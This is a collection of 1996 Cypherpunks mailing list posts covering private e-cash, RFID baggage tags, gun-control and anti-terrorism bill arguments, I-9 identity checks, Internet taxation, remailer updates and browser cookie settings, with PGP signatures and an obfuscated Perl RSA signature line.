<Shut *up*, Bevis!>
<Owwwwww! My *'Nads*!>





-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMgbH1PgyLN8bw6ZVAQGkrQP9GyrOI9NWlookyXQdbfdjmC437fxNbQuQ
g3CHsGMi4uhqO1UO6dF71XO7Osh57n//cVKF52Tv3b2UpOU3khtj15ASH7sOLaMs
KwDQYvNta1I/nL1k9L8mAnNUfEdkttfhqgKjDwB5nKvwwJqbOemG60Bz6jKzCO5T
cXOXOcEVyLE=
=Fjkr
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Wed, 7 Aug 1996 20:51:43 +0800
To: TrustBuckFella <TrustBuckFella@nowhere.com>
Subject: Re: TrustBucks
In-Reply-To: <htrb56rmj9@nowhere.com>
Message-ID: <v03007801ae2c8542fd2d@[166.84.220.80]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:11 -0500 8/3/96, TrustBuckFella wrote:

>I'll explain Private Currency and why it's good and bad. In Private
>Currency you don't "buy the [money] someplace". You mint it when paying.

IOW Electronic IOUs/Markers.

>Restraint on double-spending: Each participant publishes a list of the
>    ID and value all outstanding TrustBucks of their own variety. Value
>    of the notes can be obscured so it can only be verified by someone
>    who has seen the note itself.
>
>    What if some participant doesn't publish a complete list? Well, who
>    are they robbing? People who directly trusted them for that amount
>    and now won't ever again.

If the value is obscured there is still no verification of how much they
have outstanding. So long as all of the TrustBucks are listed (with the
amounts listed correctly but obscured), there is no way to verify that the
claimed total is accurate unless you monitor their list before the swap and
after it and there is only one new TrustBuck listed (with the correct
amount added to the outstanding total). Listing phony $0 notes on the list
and removing them later (and dropping the claimed outstanding balance)
would be possible. With this method, anyone who I give my note to will see
the correct amount in THOSE notes as well as seeing the outstanding balance
go up the correct amount but that amount can be manipulated (as I stated)
due to there being no complete disclosure of the amounts.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Wed, 7 Aug 1996 17:18:44 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: FAA to require transponders on all aircraft passengers
In-Reply-To: <199608042050.NAA12512@toad.com>
Message-ID: <v03007802ae2c8c62a9da@[166.84.220.80]>
MIME-Version: 1.0
Content-Type: text/plain


At 13:50 -0700 8/4/96, Bill Stewart wrote:


>My guess about how they'll be used is to replace the bar-code
>stickers used by many baggage-handling systems - they'll stick
>one on at checkin, corresponding to the number on your ticket,
>track them when they load them on the plane (so they know
>that all the bags correspond to people expected to get on the plane,
>as well as knowing the bags are getting on the correct plane),
>and track the tickets to make sure that all the people expected
>to get on the plane actually do get on (I think they use bar-code
>readers or OCR today, and that'll probably continue.)

They better hold off loading the containers with the luggage until they
lock down/up the plane so they can verify who got on (and can pull any
unaccompanied luggage). It is either that or unloading the plane if there
is a missing passenger.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair" (Time Keeper) <fair@cesium.clock.org>
Date: Tue, 6 Aug 1996 22:47:39 +0800
To: cypherpunks@toad.com
Subject: Re: e$: Watching the MacRubble Bounce
Message-ID: <v02140b0dae2caf6e1f9c@[198.68.110.3]>
MIME-Version: 1.0
Content-Type: text/plain


Just FYI, there is at least one other full-time Apple employee on this list.

The previous digital signature stuff from Apple was part of PowerTalk, our
own attempt to do an E-mail system as part of the base OS. We licensed the
crypto stuff from RSA (as did Lotus and a bunch of others at about the same
time). PowerTalk had good goals (full digital signatures, encrypted mail,
etc), but an exceedingly bad plan for getting there (completely proprietary
file formats and protocols, and incompletely fleshed out APIs for getting
at them).

Needless to say, it was a flop in the market, and we've let everyone know
that we've stopped development of it. Fortunately, we still have that RSA
license, and we may yet be able to do something useful with it before
either the license or the patent expires. I keep pressing people about
these issues when I get the chance, internally.

I haven't made any of the face-to-face meetings of the Cypherpunks because
I have been busy frying other fish since I got on the list. I post from
this odd return address because I prefer to use my private system and
domain for cypherpunks. At work, I'm

        Erik E. Fair <fair@research.apple.com>
        Apple Research Labs (nee Advanced Technology Group)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Tue, 6 Aug 1996 16:01:28 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
In-Reply-To: <9608052116.AA09050@Etna.ai.mit.edu>
Message-ID: <Pine.SV4.3.91.960806013641.11416F-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Phil,

The Japanese were not interned in the State of Kansas. The people 
wouldn't permit it and the FBI just quietly backed down.

The Nazis couldn't enforce the Yellow Star in Denmark. The people 
wouldn't permit it.

I can't speak about what people in the UK will permit. If they're all 
like you, they'll permit anything.

Oh the Administration and the Congress don't agree that we have a right to
defend our freedoms, if necessary, against them?  I work in a military
base in the heartland, not a computer lab in Cambridge - and I think
you're wrong about that - I don't think you could get enough American
troops to perticipate in disarming innocent civilians. And the Congress
and the Administration DO know it and are scared to death of it. 


Anyway, Phil, I was trying to ask your opinion about something.... Is 
there any freedom for which you would personally risk your life for?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Tue, 6 Aug 1996 15:51:45 +0800
To: JonWienk@ix.netcom.com
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
In-Reply-To: <199608060242.TAA18997@dfw-ix11.ix.netcom.com>
Message-ID: <9608060554.AA01285@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Contrary to reports of some sort of inversion it is not the case that
shell cases need to be found at the scene of a crime to cause an
arrest and conviction. There are many people who are serving time
after having left their fingerprints on shell cases found in a gun
recovered after a crime. If the gun can be linked to a crime scene
via balistics reports and the shells in the gun to an individual via
fingerprints that is circumstansial evidence.

Of course nobody gets sent to jail on a single piece of questionable
evidence (at least if they have a decent lawyer). But a weak piece
of evidence is sufficient to lead to a conviction if it is a lead.
Anything that reduces the search space for an investigating team
is an advantage for the police.

	Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Tue, 6 Aug 1996 16:15:07 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
In-Reply-To: <9608060607.AA01332@Etna.ai.mit.edu>
Message-ID: <Pine.SV4.3.91.960806021028.11416N-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 6 Aug 1996 hallam@Etna.ai.mit.edu wrote:
> Several years ago the IRA attempted to murder my cousin. I have been 
> warned not to continue my political activity but I do so regardless.
> 
> I do not advocate the bringing of troops onto the streets but I see 
> it as the logicial response to the case put by the NRA. They are
> playing a tune I have heard before. Claim to stand for freedom while
> doing whatever is possible to encourage restriction of liberty.

  I have added you to my computerized list of individuals who advocate 
the violent overthrow of the US Constitution.

I am going to go to the law library and see what my options are, with 
respect to filing a petition to have you deported out of the United 
States.

This is not a rhetorical statement.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Durham <bdurham@metronet.com>
Date: Tue, 6 Aug 1996 18:28:35 +0800
To: cypherpunks@toad.com
Subject: Re: FUCK YOU, SHITOPUNKS
In-Reply-To: <199608051211.GAA26432@zifi.genetics.utah.edu>
Message-ID: <3206F8E4.2781@metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
> 
> FUCK YOU, SHITOPUNKS
> DAVID STERNLIGHT

Well, I guess I don't have to take the pledge now.

Brian Durham




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Wed, 7 Aug 1996 21:37:41 +0800
To: Mike Duvos <mpd@netcom.com>
Subject: Re: Internal Passports
In-Reply-To: <199608060439.VAA25581@netcom22.netcom.com>
Message-ID: <Pine.SUN.3.91.960806044601.9565C-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Mike's post reminds me of the latest maneuvering here in DC.

The Hatch simulated "child porn" bill was reported out of the Senate
judiciary committee favorably, with the addition of language making it a
felony to *attempt* to view child porn. This wording is aimed at the Net:
  "Click Here to see Young Girls in Lust." 

-Declan


On Mon, 5 Aug 1996, Mike Duvos wrote:

> 
> The producers of the geriatric porn film "Grandma Does Grandpa",
> and the popular sequel, "Grandma Does Grandpa II", must show at
> the beginning of the film the address where the legally required
> affidavits proving that Grandma and Grandpa are over 18 years of
> age are available for inspection.
> 
> If they fail to do this, of course, they are child pornographers,
> and may fork over many decades of their lives and hundreds of
> thousands of their dollars towards the official government
> crusade to protect our nation's youth from exploitation.
> 
> The fact that Grandma and Grandpa are obviously within mere
> months of buying the farm does nothing to mitigate their offense,
> should they decide that the law is not worth bothering with.
> 
> "What are you in for?"
> 
> "Child Porn."
> 
> "How old were the kids?"
> 
> "In their mid 70s."
> 
> "Ewwwwwww.  That's sick man!  You're disgusting."
> 
> :)
> 
> --
>      Mike Duvos         $    PGP 2.6 Public Key available     $
>      mpd@netcom.com     $    via Finger.                      $
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 6 Aug 1996 17:30:12 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: The futility of trying to "tag" ammunition
In-Reply-To: <ae2bdb75040210042746@[205.199.118.202]>
Message-ID: <Pine.BSF.3.91.960806050739.11416B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



> >> US it is not unreasonable to require each individual cartridge
> >> to be stamped with a serial number and for gun dealers to be

How about just numbering the criminals?  There's more room for the 
numbers, there's precedent, and less specialized equipment is required.

 ;)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 7 Aug 1996 07:13:15 +0800
To: rp@rpini.com
Subject: Re: crypto CD source
In-Reply-To: <9608050810.AA04146@srzts100.alcatel.ch>
Message-ID: <199608060504.GAA00115@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain


Remo Pini <rp@rpini.com> writes:
> My wish list:
> 
> - - PGP
> - - A lot of algorithms in C, Pascal, ASM (for diverse processors)
> - - Private Idaho
> - - Pronto Secure
> - - a suite of html pages describing all files (I'll probably have to do that
>   myself)
> - - Netscape (the secure versions, if its legally feasable -> Netscape?)
> - - Crypto papers
> - - Crypto analysis papers
> - - Lawtexts concerning crypto (ITAR, France, ...)
> 
> Anything else?

Cypherpunks archive?

	http://infinity.nus.sg/cypherpunks/

The earlier archives were at www.hks.net, try mailing cactus@hks.net.

sci.crypt, sci.crypt.research archive?

Mirrors of:

	ftp.dsi.unimi.it
	http://www.cs.hut.fi/crypto/
	ftp.ox.ac.uk/pub/crypto

(plus Peter's collection).

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 7 Aug 1996 09:14:58 +0800
To: cypherpunks@toad.com
Subject: Re: Internal Passports
Message-ID: <2.2.32.19960806100644.00911380@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:37 PM 8/5/96 -0700, Timothy C. May wrote:

>But the law says, these days, that I must verify the
>legality of workers *if* they appear to be dark-skinned, Mexican, Latin, or
>the like. I say "if" because there are no requirements in general for
>white-skinned, Anglo workers....no work permits, no proofs of citizenship
>(such a document is currently lacking in the American pantheon...I, a mixed
>descendant of Mayflower colonist and Scandinavian immigrants, lack such
>"proof").

Naughty naughty Tim.  You're violating the Immigration Control and
Nationality Act of 1986.  You are supposed to check all employee's IDs even
your own childrens' and fill out that I-9 form.  You have to verify identity
and right to work using a menu of documents ranging from passports and SS
cards to Driver's licenses and "American Indian Tribal Documents" (I gotta
get me some of them).  And there are special provisions to punish
discrimination against those who appear foreign.  After all, there are loads
of illegal Canadians and Irish here.  People are always coming from the
third world counties.  <G>

The law also required that a commission study whether or not the "foreign
appearing" were suffering discrimination because of the law and it reported
a few years later that sure enough, they were.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blane@aa.net (Brian C. Lane)
Date: Tue, 6 Aug 1996 16:54:45 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: ****Tacoma, Washington Starts Taxing Internet Access 07/30/96
In-Reply-To: <2.2.32.19960805181729.00e8c4a0@mail.teleport.com>
Message-ID: <3206e54a.46270083@mail.aa.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 05 Aug 1996 11:17:29 -0700, you wrote:

>At 05:42 AM 8/5/96 -1000, NetSurfer wrote:
>>
>>On Wed, 31 Jul 1996, Joseph M. Reagle Jr. wrote:
>>
>>>   	  				 
>>> >WASHINGTON, DC, U.S.A., 1996 JUL 30 (NB) -- By Bill Pietrucha.  
>>> >Tacoma, Washington, has just gained the distinction of being the 
>>> >only municipality in the United States to tax Internet Access 
>>> >providers (IAPs) like telephone service providers. 
>>> >
>
>I believe the reason the Tacoma ordinance is getting so much flack is that
>they are wanting to charge sales tax on all transactions that take place
>from ISPs in Tacoma.

  

>
>This type of taxation is not new.  Various jurisdictions have tried to use
>the same thing on mail order houses.  Having worked for a service bureau
>that dealt with mail order, I know what a hassle it is to try to keep track
>of such taxation.  There is a company that will sell you the data of all of
>the sales tax rates throughout the country.  This includes every little
>podunk city, county, and fire district tax.  They are divided by zip code,
>but that is no guarantees that you have the right place. The reality is that
>trying to "be legal" under such regulations is next to impossible, even with
>the proper data.  I know of few mail order firms that are willing to go to
>that extreme.  (Unless, of course, they have gotten the proper threats from
>some miffed tax baron.)
>
>And they wonder why there is so much disrespect for the law...
>---
>Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
>        `finger -l alano@teleport.com` for PGP 2.6.2 key 
>                http://www.teleport.com/~alano/ 
>  "We had to destroy the Internet in order to save it." - Sen. Exon
>                "Microsoft -- Nothing but NT promises."
>
>

------- <blane@aa.net> -------------------- <http://www.aa.net/~blane> -------
     Embedded Systems Programmer, quick hacks on request, CryptoAnarchist
==============  11 99 3D DB 63 4D 0B 22  15 DC 5A 12 71 DE EE 36  ============




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 7 Aug 1996 08:59:42 +0800
To: Marshall Clow <cypherpunks@toad.com
Subject: Re: Internal Passports
Message-ID: <2.2.32.19960806103803.0090e254@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:06 AM 8/6/96 -0700, Marshall Clow wrote:

>I have found that promising to provide the necessary docs, and then failing
to do so, is the least confrontational and most effective way around this.
>
>"Delay is the deadliest form of denial"

Works for me as well.  Likewise, self employment.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@alpha.jpunix.com>
Date: Wed, 7 Aug 1996 08:55:51 +0800
To: cypherpunks@toad.com
Subject: New type2.list/pubring.mix
Message-ID: <199608061252.HAA01826@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone!

	The new type2.list/pubring.mix files reflecting the
disappearance of flame are now available by WWW from www.jpunix.com as
well as by anonymous ftp from ftp.jpunix.com.

- -- 
 John Perry - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMgc/31OTpEThrthvAQEvvAP/Rs+vh7LDDbEdUkacVylsoBwHXTpfvV1l
aHl7e8zt3CCueAgAXYbdHI2QPB7eptWpizlQxP3JAWB8/Z9SBzQBP/FxKIlVPKGa
p//wvh+yiUHphBh/+6G3gtrkiGnYSXqgxvnwSLGnPNIdrXLnPMe66eTP4CW9E9ZD
TC02uA9d9qw=
=0Q+6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 7 Aug 1996 21:33:54 +0800
To: cypherpunks@toad.com
Subject: Re: Internal Passports
In-Reply-To: <2.2.32.19960806044723.01073e4c@vertexgroup.com>
Message-ID: <ygN9RD39w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jfricker@vertexgroup.com (John F. Fricker) writes:
> Hmmm. Actually a long time ago I lost my job with Greenpeace out of refusal
> to sign an I-9 which was in '86 the Department of Justice's form to exhibit
> eligibility to work in the US. The form required that I present two pieces
> of photo identification or a driver's license to be authenticated by my
> employer. Maybe it's a CA state law that adds an additional skin tone
> criterium to for the filing of an I-9.

I-9 lists the documents that can be accepted as 1) proof of identity, 2)
proof of the right to work in the U.S. A U.S. passport can be used for both.
When I need to fill out the I-9, I simply present my passport. (Before I
had the passport, I used to present my naturaliation certificate, which is
also acceptable.)

A driver's licence is not sufficient because it only proves your identify,
but doesn't prove that you're allowed to have a job. There are classes of
aliens who are allowed to drive, but aren't allowed to work - e.g.,
students on J-1 visa.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 7 Aug 1996 08:55:59 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
In-Reply-To: <9608052116.AA09050@Etna.ai.mit.edu>
Message-ID: <Pine.LNX.3.93.960805215547.151A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 5 Aug 1996 hallam@Etna.ai.mit.edu wrote:
> >weaken it).  
> I doubt that more than 32 bits of info will be required. Thats not 
> that difficult to imprint.

     You haven't spent a lot of time with guns & ammunition have you?
The most common size round (from what I have seen) is a .22, .25s & .32s 
are also very common. That isn't a lot of room. 
 
> >government are in the Constitution.  That's why the second amendment 
> >is there -- to empower the people to protect themselves against the 
> >government. 
> Making that argument defeats your case. Irespective of the framers
> of the constitution nobody in Congress or the Administration believes
> that you have a right to take up arms against the government. In

     It's the truth. If you can't stand the truth, get out of the gene pool.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David.K.Merriman.-.webmaster@cygnus.com,       "shellback.com" <merriman@amaonline.com>
Date: Wed, 7 Aug 1996 12:35:18 +0800
To: cypherpunks@toad.com
Subject: Re: Cookies on Microsoft Explorer?
Message-ID: <199608061531.IAA05438@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com, aeisenb@duke.poly.edu
Date: Tue Aug 06 10:30:17 1996
> 
> Does anyone know what the equivalent technology is on Microsoft to
> Netscape's cookie technology?  Does Microsoft have support for cookies
>  or 
> not?  
> 
> All of the discussion on the list to do with
> cookies is related to Netscape.  Does this mean that if one switches to
> Microsoft Explorer one can avoid the problem?  Many thanks.
> 
> Anne Eisenberg
> aeisenb@duke.poly.edu
> 
> 

My MSIE3.0b2 does cookies - tho' I've told it to ask me if it's OK first 
:-)
I've even got a specific _sub-directory_ for cookies under my Windows dir. 
I just wish I could automate the refuse-it-if-it-doesn't-expire "policy" 
I'm running under.

Dave Merriman

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
PGP Email welcome and encouraged. Visit my web site at
         http://www.shellback.com/p/merriman
for my PGP key and fingerprint
"What is the sound of one hand clapping in a forest
with no one there to hear it?"
- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAi3uZ2MAAAEEALWQtxX77SZSaFls6cVbPp+fZS4MNyKK3ZFYQo0qWyj+0tMq
YgRTPRJRaCQixo63RttknogfPp514qdVMZw5iPeOXmD+RxrmTTwlbGqA7QUiG1x5
LG2Zims5zk4U6/rt8hwLh0/8E4lIb9r5d31qc8L1A9Twk/cmN8VrTvyYOzAZAAUR
tClEYXZpZCBLLiBNZXJyaW1hbiA8bWVycmltYW5AbWV0cm9uZXQuY29tPokAlQMF
EC6sAl+SAziJlog3BQEBxX8D/05ub986Io1PaGJgDtVlbMOPh2pjdB3QSpA8T7bh
ngpsTbogz7LnFY6nLTH24dVswnzRGzX2XYN2FXQzYLEKpbuJPF85620EqEJt7eck
kDSr0MdCorCZ3ntHGlaRIEOG8En7r/NUxtPJSbeANHyKV0pZTJ0ZF3p71yAZoCU1
JJWoiQCVAwUQLqcRtKljmJBIq8VdAQFFCQQAidBWF05UfZ3HdLTZ2BjhkiztbHIL
fCMVAzMkNobRLH0jcQ+o4N9Ny7gAP2bHreadCYQAiyx24LWZaWB+LkG48vVXvSa1
Zv+ksrEp19U30jReTaDHMRg2IDQ0S7T/+YykWf4cx/L4x0ll55zfT29THWHVqpeA
4w0PnSBJubMsG6iJAJUCBRAt7mhNxWtO/Jg7MBkBAWyPA/9BYsA3G33jcg1SfuxC
Fh4yMVZCBrvgK2FBJZUdxkgR1WfVYe5/GzV3jRzJxuXGdt0yzFb8HsocRUvnA4vi
O6Jngza+seuc+dNC8X1LyyuW0rkogVZE6ds/v4qI2P+uticCh8xBLp7ieAjvGIcc
tdQnXrMxF+w6V80cSy/dqxJjtg==
=WVf6
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMgauP8VrTvyYOzAZAQH6sQP/U8kaDIUG1VrPqqaLaXLfvS0M3bpk8fq+
YUjVEbg94qTXZeCuw+D7dKbVOtX0WiFFcvqsrTtHfZPWZQ8uHPkgAX0EHpoPoOR4
Dx44XoZrHm/fYlQV7GJh5bxB4qrRg7a4ciJ9lSHfs1tCERy6U5R687rhizS3kJYm
SOR3MBilsTE=
=OawJ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@remail.obscura.com (Mixmaster)
Date: Wed, 7 Aug 1996 09:01:28 +0800
To: cypherpunks@toad.com
Subject: Where can I obtain code similar to the Anonymizer?
Message-ID: <199608061540.IAA25410@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


I am looking to find code so I can set up a "re-webber"
similar to www.anonymizer.com.  I thank Sameer and c2.org
for nicely putting a service like that up on the Net, and
am willing to pay a fee if necessary for this code.

If Sameer's code is not available, what is needed to do
a "re-webber"?

I apologize for my inexperience in this kind of stuff.

Thanks very much in advance,







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 7 Aug 1996 09:45:58 +0800
To: cypherpunks@toad.com
Subject: Dumbo Lays an Egg (Was Re: e$: Watching the MacRubble Bounce)
In-Reply-To: <v02120d46ae2c9d988525@[192.0.2.1]>
Message-ID: <v0300780fae2ceab5c642@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:12 AM -0400 8/6/96, Lucky Green wrote:
> Robert, you *really* need to cut back on that Ritalin. No, not just `one
> more'. Put it *away*. Now!
>
> ;-)


*Now* I've gone and done it. In private e-mail, I've gotten things back
like "You're outta control, man.", and "....Boom... My brain exploded.
Summarize please." Usually, I get *nice* letters in my e-mail box after one
of these things...

Serves me right. On a second(!) read, it looks more like I didn't take
*enough* ritalin. Might have focused things down a *lot*...

That's what I get for trying out the May Method of rant-writing (i.e., fire
'em and forget 'em...). *Not* blaming May, of course, I'm just not *that*
smart. ;-). I mean, Heinlien never drafted his short stories, either. :-).
Yes, I know, Tim, You *Knew* Robert Anson Heinlien, and...

Anyway, next time, I'll let it compost a bit, like the other e$ rants I do.
On this one, I just sort of sat down, and, Flow, Vesuvius!, out comes a
rant, 6 hours later. One Command-E, and out it goes.

Now, of course, I'm reminded more of the time I played "Pinata" with the
wasp nest...

Sorry, folks. I'll be more considerate of your time on the next one. Promise.

Oh. In Re the "Hunter Thompson" stuff. I *did* read too much Thompson --
and Tom Wolfe, and lots of other people -- and frankly, unless I'm writing
something nice, dry, and pithy, which I can't do *all* the time, I can't
stop now. You are what you read too much of. I'm kind of, well, twisted,
that way, I guess.

Cheers,
Bob Hettinga




-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Blizzard <blizzard@odin.nyser.net>
Date: Wed, 7 Aug 1996 22:59:18 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Internal Passports
In-Reply-To: <Pine.SUN.3.91.960805162736.4762C-100000@tipper.oit.unc.edu>
Message-ID: <199608061308.JAA24021@odin.nyser.net>
MIME-Version: 1.0
Content-Type: text/plain


In message <Pine.SUN.3.91.960805162736.4762C-100000@tipper.oit.unc.edu>, Simon 
Spero writes:
:I've been using by british passport as photo-id for years, and I haven't 
:had any major problems- you can get your checks printed with your 
:passport number on them instead of a drivers licence, which will makes 
:things much easier.
:

There are a lot of retail stores that will complain if you don't use a 
driver's license when paying with checks.  Most check collection agencys 
track people by that number.

--Chris

:Simon
:
:---
:Cause maybe  (maybe)		      | In my mind I'm going to Carolina
:you're gonna be the one that saves me | - back in Chapel Hill May 16th.
:And after all			      | Email address remains unchanged
:You're my firewall -    	      | ........First in Usenet.........
-------------------------------------------------------------------
Christopher Blizzard   | "The truth knocks on the door and you say
blizzard@nysernet.org  | 'Go away.  I'm looking for the truth,' and
NYSERNet, Inc.         | so it goes away."  --Robert Pirsig
-------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David.K.Merriman.-.webmaster@cygnus.com,       "shellback.com" <merriman@amaonline.com>
Date: Wed, 7 Aug 1996 12:57:31 +0800
To: cypherpunks@toad.com
Subject: Re: Cookies on Microsoft Explorer?
Message-ID: <199608061614.JAA06961@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com, aeisenb@duke.poly.edu
Date: Tue Aug 06 11:14:00 1996
> Dave:
> 
> Thanks very much for responding.  Yes, MSIE3.0b2 does support cookies. 
>  I
> have several more questions based on your answer, if you have the time:
> 
> 1.  Does it ask you each time a cookie is sent?  Some sites send many,
> many cookies.  This would mean that you are in some instances constantly
> declining, even dozens of times.  Have I got this right?  

I have IE3 configured to ask me for permission to accept a cookie. Yes, 
some sites send (n!)+1 cookies during a session. If they send too many, I 
personally move on to another site, after sending them email (!).

> 
> 2.  Is "refuse-it-if-it-doesn't-expire" actually printed on the screen? 
>  I
> understand that some servers set short expiration times.  Does Netscape
> actually say, "tell us what expiration time you want?"  Or is it done
>  some
> other way?

Sorry for the confusion - the refuse-it policy I mentioned is a personal 
policy; there's no option (yet) to configure something like that in IE3. 
The only two things I've personally seen have been cookies with specific 
expiration dates (which I usually accept, if the date is reasonable 
[IMHO]), and cookies that don't display an expiration (which I refuse 
out-of-hand). It seems to be a compromise that suits _me_; YMMV.

> 
> 3.  If you can't automate, does this mean you have to refuse every
>  time?
> (This is, I guess, the same as question 1.)  Many, many thanks.

I can 'automate' to the extent of automatically accepting all cookies; yes, 
by not accepting every cookie, I'm obliged to make a decision for each 
request. One of the 'benefits' of being somewhate security-aware :-)

Dave

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
PGP Email welcome and encouraged. Visit my web site at
         http://www.shellback.com/p/merriman
for my PGP key and fingerprint
"What is the sound of one hand clapping in a forest
with no one there to hear it?"
- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAi3uZ2MAAAEEALWQtxX77SZSaFls6cVbPp+fZS4MNyKK3ZFYQo0qWyj+0tMq
YgRTPRJRaCQixo63RttknogfPp514qdVMZw5iPeOXmD+RxrmTTwlbGqA7QUiG1x5
LG2Zims5zk4U6/rt8hwLh0/8E4lIb9r5d31qc8L1A9Twk/cmN8VrTvyYOzAZAAUR
tClEYXZpZCBLLiBNZXJyaW1hbiA8bWVycmltYW5AbWV0cm9uZXQuY29tPokAlQMF
EC6sAl+SAziJlog3BQEBxX8D/05ub986Io1PaGJgDtVlbMOPh2pjdB3QSpA8T7bh
ngpsTbogz7LnFY6nLTH24dVswnzRGzX2XYN2FXQzYLEKpbuJPF85620EqEJt7eck
kDSr0MdCorCZ3ntHGlaRIEOG8En7r/NUxtPJSbeANHyKV0pZTJ0ZF3p71yAZoCU1
JJWoiQCVAwUQLqcRtKljmJBIq8VdAQFFCQQAidBWF05UfZ3HdLTZ2BjhkiztbHIL
fCMVAzMkNobRLH0jcQ+o4N9Ny7gAP2bHreadCYQAiyx24LWZaWB+LkG48vVXvSa1
